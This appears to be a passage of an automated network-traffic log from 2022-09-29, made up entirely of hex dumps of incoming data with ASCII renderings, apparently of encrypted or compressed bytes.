                                                                                                                                                2022-09-29 12:49:43 UTC10164INData Raw: 95 30 d9 d3 b9 41 b6 c9 81 9a 86 bc c9 e3 46 1a bb 4a 7c 9a 14 66 eb eb 12 bb fe 6c 2d 7d 55 3c 63 7f c9 e4 5c 29 36 c4 85 1e ec f3 52 e7 af f6 14 e3 6a d4 c9 88 d0 c5 9b 2f aa a8 3c 42 d9 ae c6 1a 9a 6a 04 1f d9 6f db ac 6a e9 66 e2 ba 5a 1d f8 4c 63 01 55 46 b3 eb 40 32 73 30 45 4a 48 fb 27 72 29 17 76 95 72 df bd 27 8a cc d9 e9 cd 1c a7 65 a6 d2 02 64 80 f8 4c a2 0b 65 cd ea 41 45 79 58 8e e8 db 2f f8 10 93 f7 dc 82 8b cd ec be 9a 65 58 6b 42 27 6a d5 61 15 ea 71 9d d1 97 6a 41 b1 0b 44 ad 77 d8 7a 57 20 70 81 71 7f c4 4c 68 47 78 66 c4 c3 1f b0 50 ed 94 79 3e 83 d3 63 b1 e7 1e 13 b9 e2 ee 4f 17 48 ed 0d c8 fd 38 c7 1e 86 5f de fd b9 e8 c8 85 c2 47 4e 30 6d 2a 03 8d ec 5f b2 8a 47 42 c2 f7 69 4f 59 33 45 18 79 2b 1b e7 b3 a6 8f a7 55 21 18 51 62 48 3c
                                                                                                                                                Data Ascii: 0AFJ|fl-}U<c\)6Rj/<BjojfZLcUF@2s0EJH'r)vr'edLeAEyX/eXkB'jaqjADwzW pqLhGxfPy>cOH8_GN0m*_GBiOY3Ey+U!QbH<
                                                                                                                                                2022-09-29 12:49:43 UTC10180INData Raw: 3b 7f b5 e5 a4 20 f8 7b 2c 6e c8 7b 9b 68 3f 31 0d 7f 3a e1 82 c4 aa 63 65 b8 3b b9 b5 b2 52 b3 bb 47 4d 4d fa 6f 7a 27 ee 1f 57 62 36 e1 91 97 8f 1d 02 c1 6c ed ba 2e 75 ad a5 7f 38 73 43 05 6a f2 65 15 2b a2 4f db a0 99 5a 70 f5 21 d7 c6 1f 15 04 aa a5 67 66 da d2 20 25 27 68 bd 4e 88 a7 7a 31 2d 5a a1 5f 31 31 d5 bd aa 5d 33 62 0c f8 9d 96 a9 d2 f8 aa 61 f7 2c 07 35 6a c7 1a 7e 61 cf 29 33 bc 21 71 4d 95 dd c1 81 e2 13 65 44 73 56 55 dd 6f 27 70 eb 98 18 4d 2a f3 9c 23 d4 86 af c9 bd b3 81 c4 e3 83 b4 61 96 ed f6 84 cb 92 f5 7b 4b 92 b2 bc 1d fd f9 6f 13 97 98 b3 5e a8 38 ec ef 7a 98 fa b3 81 2b 5f 63 7b 3a 0f ff 6c 0f 5f e4 82 1d e0 3d be 59 07 17 85 ff 7c 5e c8 ba a7 cd a6 e9 6d 6d c6 f3 62 11 2b dc c9 92 1c 55 62 bb ed 02 e6 a7 3a 82 aa bf 46 52 d4
                                                                                                                                                Data Ascii: ; {,n{h?1:ce;RGMMoz'Wb6l.u8sCje+OZp!gf %'hNz1-Z_11]3ba,5j~a)3!qMeDsVUo'pM*#a{Ko^8z+_c{:l_=Y|^mmb+Ub:FR
                                                                                                                                                2022-09-29 12:49:43 UTC10196INData Raw: f3 1e 34 c4 8b b4 58 80 fe 8e e6 b2 40 f9 6d 9c 15 e8 37 8b 96 e0 dd b7 16 2b c2 d7 13 3f 3f eb a4 57 37 8d d6 a9 1e e5 6f 43 e3 95 97 d0 74 22 da 00 c0 00 df 6c 4b 84 b9 a6 0b 59 fd 50 4f 8e 37 cd b0 ec 13 ca b7 ac 30 46 ef 66 ae 36 5c 82 fd 34 05 c6 01 cd 84 ad ee 90 20 74 11 aa 99 27 5f a7 70 53 ff 89 d9 95 8f fd e2 52 56 41 5a 61 7a e5 68 f9 e7 90 38 af fd 7e 62 f2 d6 59 4b 79 e6 70 40 83 56 0f 77 a5 30 63 86 d5 4c 51 1d ee e1 40 6c 89 3a 3a 93 1b 22 4b b6 1b fe de 5a 02 f9 db 47 8d 0b 45 83 e0 ff 49 2a 97 ee 8f 21 4b 38 7f b7 c9 73 59 94 7e 12 27 ae 62 11 78 6a 34 b8 a3 c3 5e c7 b3 7c 4c f5 4d a0 77 da 6f a0 0a 22 26 33 51 93 2c 8f 45 cc e1 c2 31 14 77 d9 e8 6a 86 f6 7e 4a b2 9a 70 af e2 90 c8 09 10 f5 89 e8 37 e9 74 94 bc 71 6d 90 b9 ee 42 2f f9 c0
                                                                                                                                                Data Ascii: 4X@m7+??W7oCt"lKYPO70Ff6\4 t'_pSRVAZazh8~bYKyp@Vw0cLQ@l::"KZGEI*!K8sY~'bxj4^|LMwo"&3Q,E1wj~Jp7tqmB/
                                                                                                                                                2022-09-29 12:49:43 UTC10212INData Raw: ad d0 29 cc 0c 6c ef f2 2d 5a 94 6b 73 4c 13 f2 6b 14 f4 0c 97 87 3c cb 9a b9 e1 d7 03 51 15 b7 df d9 d4 a2 74 1c 71 cf 46 be a9 c9 f2 3a 9c 33 e9 ed e7 8e 8a b1 f0 16 3d ad 72 6f 0f bb 2b 15 43 44 94 b6 d9 98 df 7a e1 a3 2e 0e f5 09 b8 11 95 51 84 95 bf 9f 07 94 8c 0d cc a4 79 01 95 26 bf 9d b7 89 53 99 65 a7 0f 4a c7 91 74 52 d1 5f 85 83 9d 25 2b 28 55 78 7e a5 bb f4 b8 da b6 81 18 0e 0b d4 8b 7f b4 f2 bc 01 54 48 b4 f6 5d f2 65 a5 5b 1a 50 8f b9 73 5c 9a 23 1b d8 3c 97 8e 54 ea ba a8 84 15 fe 61 f2 04 d0 0c cc 21 8d a8 13 31 b3 5f 45 95 16 40 41 dd 29 3c b1 b8 7d 0a 0d df 6e 89 fc 70 88 a7 9b ee 58 b8 6b ce ec dc 43 e0 56 9c 2a ef 56 13 6f e5 26 e8 5d e2 4c 80 98 4f 79 79 07 ee d2 99 ec 8b 17 cd ef 7d 76 18 63 cb ed 26 86 81 12 c1 f6 95 3c 0d 2f 32 a6
                                                                                                                                                Data Ascii: )l-ZksLk<QtqF:3=ro+CDz.Qy&SeJtR_%+(Ux~TH]e[Ps\#<Ta!1_E@A)<}npXkCV*Vo&]LOyy}vc&</2
                                                                                                                                                2022-09-29 12:49:43 UTC10228INData Raw: bc a7 05 3d bc d6 1e 3b 50 06 2b 78 cb 12 ec 4f 98 6e b9 f2 21 7b b5 ce fa 3a b7 4e 00 17 39 8e 95 73 c9 61 3b cf e5 6f 24 3f bb ae 43 2d 0c 76 db 9c 10 6b 6f d5 a7 c2 dc 4c 42 55 b2 b5 6b 64 c9 dc 61 7a 9a ed 11 e3 f7 38 8f 9f db 6e c8 1c 9c 2d 23 1b df 99 f8 cd c9 97 de 3c 78 45 bc 5b e0 6e d5 48 be 22 14 65 8f 8e 58 7d 70 15 a0 a3 0f 27 ec 78 7d cd 38 7f 4e 0f f1 a9 8a 4b 01 c4 3c 93 4c 57 75 44 49 0a 69 ac 30 38 12 f0 ca 4b 71 58 74 09 6d cf f8 11 9d b4 26 92 43 5c 82 88 73 e2 b2 eb e6 3c 68 d8 0a 24 15 35 d3 fe 1b cc de c8 f2 85 01 9c f6 0e 29 16 de 84 6e b5 ea 2e a7 d8 41 63 64 a2 64 46 9b 0f d1 88 c7 de a7 5c de 53 c8 64 e7 61 93 8d dd 0f 32 3d 8d a9 1e eb e3 3d 58 e6 c6 2e 7d 5b 0a 53 06 70 8e 8b 26 83 3a 47 f4 3e 68 3d ce 70 fe bd c6 7d 17 fd 03
                                                                                                                                                Data Ascii: =;P+xOn!{:N9sa;o$?C-vkoLBUkdaz8n-#<xE[nH"eX}p'x}8NK<LWuDIi08KqXtm&C\s<h$5)n.AcddF\Sda2==X.}[Sp&:G>h=p}
                                                                                                                                                2022-09-29 12:49:43 UTC10244INData Raw: b1 1c 33 75 a9 ba b6 64 47 78 56 25 de 46 c4 2a d6 9b 67 45 ce 71 f9 e4 a9 ba 64 13 ab d3 e8 4f 01 ef 8f 0e af 8c 38 ba 55 cf 0f 61 b7 97 e5 32 ef 2e 26 c6 cb 30 fd 97 78 9e 26 64 70 d5 f3 65 82 01 a3 22 f7 67 25 e9 d7 43 b8 f9 34 1f da b4 db 3f 7c 31 3e 9e 15 01 42 da bf 8c 8d 30 40 94 5f 0a c7 35 33 9e 30 fe b5 f2 ab b9 c8 31 1d f0 5c 0d 9b 1a e0 c9 76 22 1d c7 da 99 ec b8 d7 67 ba 44 2b 81 e2 df 73 3d 1e 04 87 8b 74 71 6c 5e 7f 9b 67 f7 4a 52 5c 9e 61 fc af 78 7e f1 89 d2 19 5f b7 90 e3 cc 3b 5f 67 d6 bd d5 0f 9d 47 d7 44 fb 2e d3 58 e7 c6 5f de c2 da 1c 59 8b 89 e8 7c a1 7c 32 f6 44 e1 bb 76 47 82 a5 c4 ce 43 c9 af be 4a 0d f5 76 6f 0d e2 f2 60 ae 8d 56 1a 84 01 3f c6 b9 ee f2 57 05 ce 6b d9 30 f3 dc 48 c9 0d 04 5d 80 d5 23 84 5d bc e5 fe 35 82 a7 10
                                                                                                                                                Data Ascii: 3udGxV%F*gEqdO8Ua2.&0x&dpe"g%C4?|1>B0@_5301\v"gD+s=tql^gJR\ax~_;_gGD.X_Y||2DvGCJvo`V?Wk0H]#]5
                                                                                                                                                2022-09-29 12:49:43 UTC10260INData Raw: 12 87 03 12 79 d1 43 38 8d 47 0f 73 4d 4f 10 08 92 b4 f2 7f 42 3a b2 b9 5e ed 1a 9e 3e f3 0b 9b 95 ee d2 86 25 3e 9a b6 48 4e 0c 7b d5 18 b8 53 fc 24 bb d4 a0 ef 1e 03 f1 c5 d8 55 80 19 51 73 81 e6 e6 f4 22 29 fd ec 0e fa 29 85 7a 24 87 99 8c 5c ac 8c b2 4b 27 97 87 3d e1 54 5a a9 05 c7 9b e9 bc 34 5d 75 17 d8 ac 0a a3 7d bb 7d ca fe cd e5 c6 8f f2 c3 5d 73 f4 1b bf fd 59 ac 95 7f 43 71 91 29 fc 94 eb 13 17 5f 36 eb d6 da 4d 3b ab 0c 31 1a f5 33 1d e1 be 37 7c d0 f9 b6 8c 12 f6 24 4e 4a 18 e7 46 59 af fc 3a 6f dc 90 3a ad 9a aa f2 4e a5 92 08 96 14 24 c7 59 3a 46 57 97 bc 4b d5 80 7a 20 18 4c 4f a3 16 9d b0 31 90 f3 a9 a5 ef 93 ca d2 89 c7 e4 8e 1b 68 f2 6a 4a 68 ef 09 00 23 ca ee 14 ae 40 36 ec c9 54 62 7a bd 60 6e 49 02 c9 45 3a ff d4 ff cf db e0 99 36
                                                                                                                                                Data Ascii: yC8GsMOB:^>%>HN{S$UQs"))z$\K'=TZ4]u}}]sYCq)_6M;137|$NJFY:o:N$Y:FWKz LO1hjJh#@6Tbz`nIE:6
                                                                                                                                                2022-09-29 12:49:43 UTC10276INData Raw: 19 9b 46 31 60 b2 d8 98 13 52 51 81 55 41 71 63 b0 5e be 1a 24 13 87 a7 00 8f e5 59 72 11 ef ac 12 c7 89 be 8f 05 81 7e 11 3e 02 16 97 ac 37 3a 14 92 6d 9e 18 f5 f2 c1 42 c3 72 49 5c 1b 88 02 63 09 0e 4d d1 8b 46 ce 9d 64 dd aa 9b ed 76 1c 3e 20 8c f5 7e d5 95 78 26 10 a0 e9 05 9a fc 48 3a 25 22 1b 55 84 8c 3d 19 05 94 e1 06 64 37 09 8f ed 56 79 44 77 64 e2 35 a8 da 11 64 39 a1 d1 64 d3 ee 5d 8f 37 4b 69 c2 94 8b f7 8c 8c 99 c0 16 42 06 0f 77 a5 b9 17 f1 78 b9 e0 3a 3c 3d 07 06 42 a6 a4 ea e8 ef f7 07 73 f0 e9 e7 56 eb 01 e2 0e 8d 1c 8b 83 98 d5 30 94 2c 86 49 8c 0f 8b 57 ff 97 e7 c9 4f e5 2a bf 70 a4 93 81 42 5f 1b 00 5a 99 95 92 f8 8f a7 12 d2 4a 4c 26 8b 55 e6 0f 5b 94 aa 5c 49 0d 52 02 e2 c0 1d f3 e4 49 fc 5f cf e2 70 a0 1e f3 11 c6 02 06 36 5c bb f5
                                                                                                                                                Data Ascii: F1`RQUAqc^$Yr~>7:mBrI\cMFdv> ~x&H:%"U=d7VyDwd5d9d]7KiBwx:<=BsV0,IWO*pB_ZJL&U[\IRI_p6\
                                                                                                                                                2022-09-29 12:49:43 UTC10292INData Raw: 80 6e 27 b8 63 f0 d4 c4 3b 3b a4 14 4e b4 82 2f 2b 8f 3a 9f 3b 79 c3 84 bf c4 41 c2 05 7a 41 a7 59 e4 39 a3 f4 b3 c7 93 3b e5 65 99 1f 7a 09 94 b2 85 ce be d4 37 5a 0d 43 3b 7c bc 96 61 e2 d3 06 cb f6 de 94 a5 a7 88 0c 6c 21 6b 43 25 70 fa b0 bf fc 82 b5 bd 72 76 3d ca ab 71 fc 7a e7 0f 76 4c 9f ec bf a7 95 97 da 0b e7 9b eb 55 e0 f8 ad 64 a5 8a 5f c6 dc 99 3c 76 33 96 7a 85 72 90 87 b7 1f db a0 e1 5c 09 20 a5 db e9 fb 49 e7 1c 87 fa 17 40 d0 37 42 90 54 d3 2b 06 9a 91 cf 7b f9 13 d1 9f df 72 d3 f9 13 e1 33 73 ec 75 fb c2 59 3f b9 b7 df 5b f3 0c 7c c6 8c 7f 3f dd 7c 47 a2 6a 88 e0 68 65 02 50 16 fd 44 73 45 f8 2c 5c 92 2f b0 a3 55 b6 81 c8 e5 7c 9d ef 41 40 41 01 b0 5b bd 46 c0 34 bb a0 00 d8 3b 21 a7 a2 0b 65 75 b5 0f 5f ab 68 74 ff b8 5b 1f 75 d5 be 77
                                                                                                                                                Data Ascii: n'c;;N/+:;yAzAY9;ez7ZC;|al!kC%prv=qzvLUd_<v3zr\ I@7BT+{r3suY?[|?|GjhePDsE,\/U|A@A[F4;!eu_ht[uw
                                                                                                                                                2022-09-29 12:49:43 UTC10308INData Raw: f9 75 aa 62 95 7c db cc 4d bd 4f ce 22 46 3e 57 e9 ca d7 74 23 10 4e b2 cf e9 a5 ef 52 c5 06 73 17 dd 6a c3 99 34 90 75 7c 27 e3 8f eb 93 b3 92 4e 9b 52 c1 69 3a 25 13 ee a7 41 dd a9 33 4b 4a d4 e8 31 37 24 b4 b5 d0 c7 52 77 b6 90 48 9d 76 b9 f5 ba d8 83 89 17 f0 99 98 c4 25 1f 25 54 1d 55 81 5f bf 69 d7 6f 8c 6c 1f 0c 59 1a 4a d4 f6 7f a7 6c d4 5a 3a 26 c7 e2 17 99 db 88 30 ca 59 3e 98 d4 b9 19 4c 3d 1d 92 23 dc 68 09 6d 9c 23 e1 71 78 28 16 da 47 72 cf b3 d5 53 d7 d1 47 19 77 86 fc e8 71 25 6b d5 ba fb 7b dd 48 43 fa af 99 1d ca f0 64 c0 12 3f d4 df 53 ca fe dd fa 75 ed 53 99 b1 6b 3e 8e 32 c8 4e 46 af 3b 9d 3d 8e b5 f6 d3 5e 98 1b 2b 9e 27 3e 6c f1 ff 88 65 c1 bb 98 9a bf 10 95 d8 f2 72 47 1a 1a 78 22 61 c1 5f 49 dc c9 c2 3b 02 8a 2d 60 8b ae d6 ad 99
                                                                                                                                                Data Ascii: ub|MO"F>Wt#NRsj4u|'NRi:%A3KJ17$RwHv%%TU_iolYJlZ:&0Y>L=#hm#qx(GrSGwq%k{HCd?SuSk>2NF;=^+'>lerGx"a_I;-`
                                                                                                                                                2022-09-29 12:49:43 UTC10324INData Raw: ca 60 86 ac f0 c0 e4 66 37 38 72 36 86 02 57 6f 9d 9f 07 66 ad 07 c9 87 ac e4 bf 6c 5e b0 fd ff cc ae e6 92 1a 85 8d ad ec f5 10 84 14 6f 22 92 d9 9a e2 1a fb ed 7f d7 9a 40 b5 db 34 b4 79 e4 1a 87 ca a4 cc 98 b2 26 d1 68 ea b6 16 3d be d2 0c 5b ea 65 84 cb 82 c0 1c fa c2 5c 8a 92 a5 1f c7 a7 93 d0 2e e9 37 9d 63 4b 0a 0e 3f 3a 3c d5 c2 10 e8 6c 8f c3 65 e3 b3 49 4f 28 e2 a2 39 14 ad 07 2e 4b 3e 98 a7 40 ab 5b 0d 4f d7 58 94 6a 69 ab 73 bc 89 c2 1f 2d aa 51 5a 2f 43 90 e6 24 ef 2f 88 fc 8d 38 81 23 0a 61 91 9b c0 27 c9 78 89 5c c9 a0 7d f3 46 39 ea dc 5b dd bc 51 a7 5d e4 25 cd 2e 0b 58 c2 44 a0 cf 2d 6b bc cd d1 a1 c6 ae c2 98 5b f1 11 9b ad 40 cc e4 a4 40 a0 7d 0f ca cf 22 62 79 e6 58 a2 c8 3d b1 be 97 c0 0f 0d f9 5a ec 92 14 03 76 3b 34 de 10 ca 1a db
                                                                                                                                                Data Ascii: `f78r6Wofl^o"@4y&h=[e\.7cK?:<leIO(9.K>@[OXjis-QZ/C$/8#a'x\}F9[Q]%.XD-k[@@}"byX=Zv;4
                                                                                                                                                2022-09-29 12:49:43 UTC10340INData Raw: a5 d1 3b 18 4b c2 fa 24 36 78 b4 c3 01 78 74 56 70 e2 14 bf 24 95 2e db 13 7b 97 d1 83 98 e4 05 b4 21 bd 7d 6a d1 1c ff 36 be 07 90 a3 7f 83 c7 5d 80 3f cb 20 bb 4c c0 a7 32 d7 27 24 c2 5a 5f ab 58 d8 30 36 c8 43 5d 78 1c 49 6c e0 5f d7 e8 da 81 79 1f a6 26 7e ee 9b 2e e1 7b 14 56 66 d3 da 31 66 f9 35 9c ad 3a f6 cf 40 cf 92 ba 68 ed f6 80 c9 af 23 57 bd a1 07 e6 21 68 d8 16 b7 86 cb 88 6e 28 aa 62 78 22 6a 0c 72 96 5c af af 71 75 cf 65 04 53 64 5b 20 37 ac 9e 5b 6e cc 18 98 28 33 53 16 fa 79 37 af 3f 2f 5c e1 37 1a 05 36 4f c7 01 39 cf 3f 78 ff 8a 2c f1 99 d9 77 70 8a f9 f9 8f 72 ec 44 c5 fd 7f 6e 93 3f 52 93 3f a4 ab 97 d8 f4 8a 96 11 c4 06 e1 02 8d 2e 47 25 bc 0f f4 0f a5 ca bf 69 38 5a c2 37 d8 fb 13 ca 0c ac af 1a c4 93 16 ba d6 6a f0 ff eb 39 ca b8
                                                                                                                                                Data Ascii: ;K$6xxtVp$.{!}j6]? L2'$Z_X06C]xIl_y&~.{Vf1f5:@h#W!hn(bx"jr\queSd[ 7[n(3Sy7?/\76O9?x,wprDn?R?.G%i8Z7j9
                                                                                                                                                2022-09-29 12:49:43 UTC10356INData Raw: ed e7 5c 61 0b 0a f9 69 98 d1 c8 16 08 5d 49 72 dc fc 16 ca f1 e2 26 b5 6b 0d 32 f2 f8 59 e3 a9 83 2d f1 d2 08 22 b4 45 d2 9d aa 5c 4b 0d f1 48 85 07 b8 a8 11 d5 27 f6 e3 ab 7e 46 fc 1b 94 89 17 df ab da 2a 1e 4c d7 fe 5d 59 d8 03 08 40 ea 3c f3 09 db 99 3c b7 1a 29 a3 aa 0d 46 7f 77 1a 7e b3 df ae fe 1b 5b 75 9e ef 95 7b 6f 2c a1 0f b3 24 72 29 22 18 92 dc a7 ec 7b 46 8d 93 e2 61 84 f7 f9 f4 72 5a 23 b5 5c f6 fa 3a 44 c8 3d 69 3d 87 51 95 ab f7 94 68 27 23 43 30 ae 20 da 09 9c e3 7e af 07 53 44 1b fe 40 bf 54 85 dc e9 cb 4b e6 fd 33 f6 d0 c2 f3 d8 23 e5 6c cd 9c 48 b1 cb 0d 40 7c 57 0f cf e8 64 ba e2 63 f1 75 8d 29 19 f5 c4 ca f8 b1 a0 fd 12 a6 0c 7b 12 f4 6d 25 47 dd e1 56 07 5a 0b 0c 5f e5 6a 14 bd e7 25 34 6b ad 39 68 73 97 84 92 88 6e 21 6d e3 4c ff
                                                                                                                                                Data Ascii: \ai]Ir&k2Y-"E\KH'~F*L]Y@<<)Fw~[u{o,$r)"{FarZ#\:D=i=Qh'#C0 ~SD@TK3#lH@|Wdcu){m%GVZ_j%4k9hsn!mL
                                                                                                                                                2022-09-29 12:49:43 UTC10372INData Raw: ed 6d 45 cb c4 7d 42 a2 76 f1 e7 63 37 c3 e5 53 84 28 47 9f a2 50 cc 7d 2f 79 de 3e 13 48 16 51 28 16 c9 10 51 a4 39 c2 b2 f9 26 0a 1d f6 af d6 b5 fc ad 85 bf 08 8d 14 72 73 7a 54 71 d6 e0 97 82 ac 44 b8 d8 4c b0 a9 fb 1f 1c 61 61 06 00 3c d5 27 42 89 31 aa c0 d4 74 49 33 61 40 af 02 9e 7f 31 f6 37 6f ee a7 69 07 78 4c 05 23 89 bb 35 5c 3f 5a 36 d2 52 fd af e8 8d 7c ec a7 88 97 a0 1e 48 ba 74 97 eb df 19 56 07 5f 5b 66 41 36 0a a0 de e1 5a 82 0b 8f 69 1a e4 f6 b7 d1 8f 8d 4d 71 41 30 45 92 10 88 28 27 27 e0 51 31 40 4a 26 65 fc 0a de e8 64 da c8 58 5a b5 42 a8 bc 29 ea 94 1c 49 33 60 85 7e 39 40 b0 61 cd b2 02 6b 79 a5 5c e3 3b c7 f2 d6 75 ca 5c 7c 4a 92 12 eb 17 ac 79 26 1b ff 75 12 c2 40 43 e8 1b e7 70 8a b0 d4 b6 dc a5 21 c9 83 90 70 fa e0 d5 13 ce b3
                                                                                                                                                Data Ascii: mE}Bvc7S(GP}/y>HQ(Q9&rszTqDLaa<'B1tI3a@17oixL#5\?Z6R|HtV_[fA6ZiMqA0E(''Q1@J&edXZB)I3`~9@aky\;u\|Jy&u@Cp!p
                                                                                                                                                2022-09-29 12:49:43 UTC10388INData Raw: 01 89 37 e7 24 8f a6 05 e6 14 49 d8 06 20 06 c4 ca 95 46 2f 4b 54 62 80 db ec 84 45 f6 cb 16 be e5 40 52 97 4e 93 4c 35 96 6b 43 d9 db 19 b5 aa c8 35 4a 0e 40 c2 c4 a8 b3 bc 0c 76 8c 7a 26 41 36 a9 75 b4 4a bb 86 4f e9 84 f7 0b 44 10 55 53 d8 94 ca 51 3c be 04 a6 06 ef 5c f4 57 e2 1c 4d 5f 98 ae 54 13 cc a3 17 76 9e ff 47 72 42 49 05 84 c5 85 37 ae 4e e5 b7 f2 f7 27 d1 69 d4 8d 87 8b 4f f8 92 83 0a ee 2b 20 4d be 80 bb 51 fd 5d 65 80 30 0f 33 76 fc 53 30 48 63 e7 93 52 0b ca 70 ca bb a7 3b a3 ea 60 63 7d e9 5c b9 a0 6d a0 7b bb 62 14 73 42 95 cf cc c7 24 b4 9f a6 e3 fc 8b 1f c4 9d a4 3a bc 02 38 96 06 e5 eb 16 f3 32 50 f6 a9 fe 22 b0 12 29 b2 17 5f 2c 8d eb ac 5b c8 75 b3 89 40 0f 41 9a 9a 86 61 94 ca 6c 5d e4 2b 61 a9 53 71 48 8d 63 a6 c6 d5 b5 55 a2 72
                                                                                                                                                Data Ascii: 7$I F/KTbE@RNL5kC5J@vz&A6uJODUSQ<\WM_TvGrBI7N'iO+ MQ]e03vS0HcRp;`c}\m{bsB$:82P")_,[u@Aal]+aSqHcUr
                                                                                                                                                2022-09-29 12:49:43 UTC10404INData Raw: ae b0 ad ef fa 16 72 41 53 e2 0a 8e 08 cb 4c 81 84 05 d7 76 85 48 ce 3b 38 cf 2f 9c ad 5b d2 7c 8a 90 1b a7 27 4b 1d 1e ab 2a ac 52 b9 0f f0 5c 9d b4 39 0a 54 ef e1 77 93 1b 7e 0c 54 65 18 b1 ee 42 3d 47 ce 82 3b 5d 8e 3e 69 f6 63 77 79 2a dd cf f4 44 41 e4 de 98 c5 71 5b fd 14 14 e8 9d fa b0 68 d9 a3 9b 47 03 ad 45 bd ba e9 bd 1c 8d c3 34 97 93 7c 42 40 4f 8a e6 3c 10 15 11 79 98 97 31 7b f0 7f 51 86 3f 0f a9 eb 4d 37 44 51 5b d9 34 9f f6 12 5d d6 17 5f ec 05 32 32 c7 1c 9f e3 a9 3d 40 b6 46 57 b5 81 2c 74 d9 bf 8a e5 54 b2 ee 80 ac c9 7a ff ba 50 81 7a 18 01 c1 cb 46 21 00 0a 50 54 65 09 c0 6b ea 06 de 8e 4c a3 e7 fa d5 8d 90 a3 e2 2a fa c1 49 8c 2f b4 78 cd aa ad 9f 9e 42 62 0f e8 c7 b6 de 98 1e 7e 98 07 97 10 4d 44 c0 72 af 8e ca c7 85 17 b3 6e c7 55
                                                                                                                                                Data Ascii: rASLvH;8/[|'K*R\9Tw~TeB=G;]>icwy*DAq[hGE4|B@O<y1{Q?M7DQ[4]_22=@FW,tTzPzF!PTekL*I/xBb~MDrnU
                                                                                                                                                2022-09-29 12:49:43 UTC10420INData Raw: d0 73 e6 e7 78 78 b1 87 07 5d 4a b8 59 e8 32 cb a9 56 e8 ac ce b5 66 c9 42 72 83 c2 63 90 a7 c6 05 01 e7 fe bc 40 a6 ea 1f 08 13 9f 0c 8e 7c a4 c7 85 ff 59 f4 71 5a ca de 63 1a 2f 56 82 7d 33 88 a6 1b fa b6 c9 e6 96 80 10 f7 1f a2 36 fe 3d f6 95 89 fe cd de c6 bb 03 9c cd 49 bd c5 ce 1a dd c4 f6 9c 8d 67 3d e7 a1 a2 62 55 89 05 99 a3 0a 1c 6c 44 bf 38 52 c2 ef a8 46 84 ed b4 0b 49 5a d1 f6 d3 11 46 c9 26 08 68 a4 bb e7 e9 e8 8c 95 c0 c8 94 11 7a 0a bb 53 89 a8 43 9a 16 99 31 d8 fc 89 a0 80 16 39 89 d1 f4 e2 af 63 13 27 b7 92 99 9b 17 ca 2a 42 58 16 fe 5d 96 fc 03 75 91 0a 08 12 42 f7 22 d7 16 9b d5 2a 2a 13 53 f5 94 20 64 41 b5 6e 50 17 8b c6 11 25 65 c8 0e c5 8d 2d cc d8 c0 01 99 05 9f bc dc c5 38 84 8e 45 05 8e b9 ca c4 37 57 3f 1e 44 3c 89 7f c1 eb de
                                                                                                                                                Data Ascii: sxx]JY2VfBrc@|YqZc/V}36=Ig=bUlD8RFIZF&hzSC19c'*BX]uB"**S dAnP%e-8E7W?D<
                                                                                                                                                2022-09-29 12:49:43 UTC10436INData Raw: 8b fd 4e ee 66 f4 14 8f 95 dc cc 5b 24 0f 4d c5 6e 97 4f 39 06 bb 3d b2 6d d9 dc d3 67 7f 67 9a 14 c4 37 49 3e c8 53 aa ac 90 42 a7 ff b7 fd fe 3a 7e 72 0c 55 bd 40 7e 14 1e 52 3f 1f ce 06 15 e2 d1 1e ae 28 2d b1 66 55 1c 57 38 d2 6a 28 0f 8d 62 91 7e 54 13 1f 7c 59 b7 63 0b 02 db fe bd 32 ae 12 5a a6 7d 53 15 f1 8a 10 60 e9 2e 95 32 c4 33 fb f0 5a 5b 42 c2 a4 44 a0 69 1f 22 79 4e fe 8f 20 97 ae 17 21 07 78 bb b0 da f8 99 31 cf 03 fc 9a 3d 64 53 42 22 f5 63 5c 90 6a ef 0d d5 42 f5 a9 d9 6c 11 c6 ef 32 3c 04 11 a3 17 79 0b 10 21 7a 72 44 29 7d e2 30 f6 d0 9a b0 e7 f9 62 14 7e 19 06 3e 34 68 8e c1 b0 fd d2 22 4f 95 cb f1 6a b5 60 23 f7 73 3e ac 07 23 57 d1 04 74 cd 97 40 49 07 63 65 ca 2e a4 a4 94 90 c2 83 b8 88 a7 ba 4a a0 2c 5c eb 8a 5c d3 c4 fd be 6a ca
                                                                                                                                                Data Ascii: Nf[$MnO9=mgg7I>SB:~rU@~R?(-fUW8j(b~T|Yc2Z}S`.23Z[BDi"yN !x1=dSB"c\jBl2<y!zrD)}0b~>4h"Oj`#s>#Wt@Ice.J,\\j
                                                                                                                                                2022-09-29 12:49:43 UTC10452INData Raw: a8 f6 77 be ad 0b fb 61 a4 07 03 16 73 f1 65 e4 7c 6a 47 c0 43 f2 a4 e3 ec f5 63 d2 1a a4 87 d3 d7 e6 81 c4 c4 91 8a e3 24 c8 5b 95 6a e6 69 e1 9c af fe 44 dd 25 9a 84 ad 08 de 7d 49 9f 75 87 96 1c 94 55 34 50 ed 30 40 52 75 ec 9e 0b 46 1b 96 95 a1 d2 e9 61 6f 7c ec ad 0f f9 ce 8d 61 37 e2 12 43 ef cd ca 90 3f e1 5b 6c b4 61 f8 cb e9 47 eb 23 4a c2 5b 11 a2 42 f9 c0 47 8e d4 bf bc b2 3c cc c4 f3 91 87 4e b5 c4 a8 2c 92 a8 7c ea 25 49 d5 fc 69 f4 1e 90 2a 8f 13 7e 7a 4c 07 77 a0 4f f9 4e e1 07 27 75 a7 e6 e1 c8 b5 6b b1 0f bc 49 bb 59 8b d3 1b eb 5d be d1 2a 94 1b 2f 2c 65 f0 f1 fa c7 7d d8 b9 08 12 06 94 ed ac 45 04 d1 78 30 7e 4f 96 93 90 2d 9d f8 e4 02 cc a9 2b c4 12 02 81 8d 73 f7 86 e1 b1 bb e8 1d 0c a2 a4 1b ed af f2 a4 f3 67 74 4d 2f 3b 51 7c ab 5e
                                                                                                                                                Data Ascii: wase|jGCc$[jiD%}IuU4P0@RuFao|a7C?[laG#J[BG<N,|%Ii*~zLwON'ukIY]*/,e}Ex0~O-+sgtM/;Q|^
